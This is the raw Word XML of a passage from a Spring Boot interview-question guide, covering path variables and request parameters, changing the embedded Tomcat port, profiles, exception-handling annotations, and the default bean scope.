    <w:p w14:paraId="65FE2F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637D0C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Path(@PathVariable("id") int userId, @PathVariable("name") String userName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F57CD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Path): " + userId + ", Name (Path): " + userName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767466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7AAD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RequestParam</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F61BFA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6401A4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RequestParam(@RequestParam("id") int userId, @RequestParam("name") String userName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1F55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RequestParam): " + userId + ", Name (RequestParam): " + userName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032C9D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195B3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71A5A1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extracts 123 and John from the path /api/user/123/John.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FE69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extracts 456 and Jane from the query string ?id=456&amp;name=Jane.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583836E6" w14:textId="48E93CA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682" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="787B07BD" w14:textId="6CEBA6BD" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="004F0738">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="660" w:name="_Toc197867874"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to change the port of the embedded tomcat server in Spring boot? Write a syntax for that</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="660"/>
    </w:p>
    <w:p w14:paraId="7FD2E8AC" w14:textId="50D6471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change the default port of the embedded Tomcat server by configuring the server.port property in the application.properties or application.yml file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59351C7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ing application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65922F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the port in the application.properties file, add the following line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344400D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE0143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change the default port from 8080 to 8081.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4275387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application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2604BC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pplication.yml, you can configure it as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB0D6C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012BBB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05D258D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rogrammatically (Java Config)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A6DD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change the port programmatically by creating a SpringApplication instance and setting the port like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299B32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41DEDC5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1DB843A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context.ServletWebServerApplicationContext;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41087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er.WebServer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF72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ConfigurableApplicationContext;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53254351" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57945E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71ECF5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2A8B83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454D5B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 app = new SpringApplication(MyApplication.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C662C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p.setDefaultProperties(Collections.singletonMap("server.port", "8081"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC8D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bleApplicationContext context = app.run(args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F19E77B" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD21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ptionally get the server instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095DE36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Server server = ((ServletWebServerApplicationContext) context).getWebServer();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EA08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Server started on port: " + server.getPort());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5FF8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CBA1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C90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de changes the port to 8081 programmatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7280038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4. Using Command-Line Arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341507F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pass the server.port value when starting the application via the command line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DEB2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lication.jar --server.port=8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B83B43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override the default port configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A4CA8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6AFAEB0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server.port=8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37170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server:\n port: 8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0933E0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w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: app.setDefaultProperties(Collections.singletonMap("server.port", "8081"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2645B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mand-Line Argument</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: java -jar myapplication.jar --server.port=8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118548A8" w14:textId="03467DE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683" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC49431" w14:textId="60212387" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="004D2687">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="661" w:name="_Toc197867875"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are Profiles in Spring boot applications? Give one example</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="661"/>
    </w:p>
    <w:p w14:paraId="6785AD3B" w14:textId="121ED82E"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allow you to separate settings, such as database configurations, external services, logging, or security settings, depending on the environment in which the application is running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FA4DE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Profiles Work in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758C4E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 or application.yml:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You can define multiple properties files for different environments (profiles). For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229CD61F"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dev.properties for the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>development</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CF303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prod.properties for the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>production</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2879765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test.properties for the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>testing</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BE93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r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Profiles can be activated in several ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682399F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ia the application.properties or application.yml file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D6C73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command-line arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A64A93"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in your Spring Boot application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6087B3F4"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510F8D9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB73CD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fault configuration (for all environments)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA692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1D4D07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F13EC91" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6739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specific configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551BF11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2BFC0FD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profile-specific properties files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF9605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1CF18E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 environment configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A04B8E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_dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2235F5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0B22529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ord</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC85F4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FA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od environment configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6008B8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mydb_prod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49940FB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502B7E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ord</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA0D5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p>
    <w:p w14:paraId="483DE41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 application.properties:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You can specify the active profile:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0963FB0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  # Or 'prod', 'test', etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA22FFB"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ia command line:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When running the application, you can pass the profile using a command-line argument:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7817945C"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prod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA38801"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 in Java code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA56E8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Application app = new SpringApplication(MyApplication.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648CD9B2"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setAdditionalProfiles("dev");  // Set the active profile programmatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A88808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run(args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B735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pecific Beans:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C91F8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also define beans that should be loaded only for specific profiles using the @Profile annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E9914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97782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CE8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558C94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Config {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1C2E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D1D98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43772D8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mydb_dev");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A06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82FA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D983C4" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A0DA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2D8567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007A080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Config {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64936E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708E2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AEBC1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mydb_prod");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4167C1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7506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7DF5A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34511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help configure different settings for different environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC330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via properties files, command-line arguments, or programmatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2E293F" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="00CE4B95" w:rsidRDefault="009910A9"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Profile annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to load beans conditionally based on the active profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5176E205" w14:textId="7AE2985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684" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1098C386" w14:textId="1187A48C" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="004D2687">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="662" w:name="_Toc197867876"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which annotations are we using in order to use the Exception</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="662"/>
    </w:p>
    <w:p w14:paraId="6175AC1B" w14:textId="6B2004D3"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ceptionHandler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308C36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handle specific exceptions within a controller. It defines a method that will be invoked when the exception is thrown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E171EB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is used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to handle specific exceptions in the controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28012B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0171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27AD74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DA2638A" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D172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31B1D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725A2BE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rue) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08542C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CustomException("Something went wrong!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202E43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DECC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35075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B14F" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E46DD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0FB0DF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0F8A4A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476488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56F2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E6AF9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Advice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEC28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works well with the @ExceptionHandler to centralize exception management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0042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7FDCE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4EE929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GlobalExceptionHandler {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F64523" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FC746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5AE78C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7FFFAD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0EA2E9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EA1A36" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21FC5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8A606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454C4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030DE3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DAC45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AAD4C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ResponseStatus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B10C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an be useful for returning specific status codes for custom exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEDE8C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6408C0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Status(value = HttpStatus.BAD_REQUEST, reason = "Invalid input")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED20D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 extends RuntimeException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4D25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ustomException(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799889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6BE42A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3D2C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D3E52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stControllerAdvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300AF5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D4DC6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1BD35B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1679E000" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C93181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121138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39C38E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1E4D59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71742E" w14:textId="77777777" w:rsidR="009910A9" w:rsidRPr="002C6305" w:rsidRDefault="009910A9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5382C9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5B6B98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9CF4D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30E29B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78CC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52A44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sponseBody</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7443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ensures that the return value of the handler method is written directly to the HTTP response body (used with @ExceptionHandler to return a response).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5454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73C25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Body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5983D4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Handler(CustomException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317C7C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handleCustomException(CustomException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC9F54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getMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D3EC2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18617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Annotations for Exception Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245F50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eptionHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Handles specific exceptions within the controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77954D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Advice</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides global exception handling for all controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BFD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Status</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Sets an HTTP status code and a message for custom exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B45424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Advice</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Similar to @ControllerAdvice, but for REST APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0C47C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Body</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that the exception response is serialized to JSON or XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312986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these annotations, you can easily manage exceptions and provide meaningful responses to clients in a Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C942A9" w14:textId="6D9F596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685" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C6CE59" w14:textId="75990111" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="004D2687">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="663" w:name="_Toc197867877"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the default scope for spring beans</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="663"/>
    </w:p>
    <w:p w14:paraId="1668D765" w14:textId="35982AD2"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default scope for Spring beans is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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1BFDC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7FE2BA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is the default scope for a Spring bean. This means that Spring will create only one instance of the bean per </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
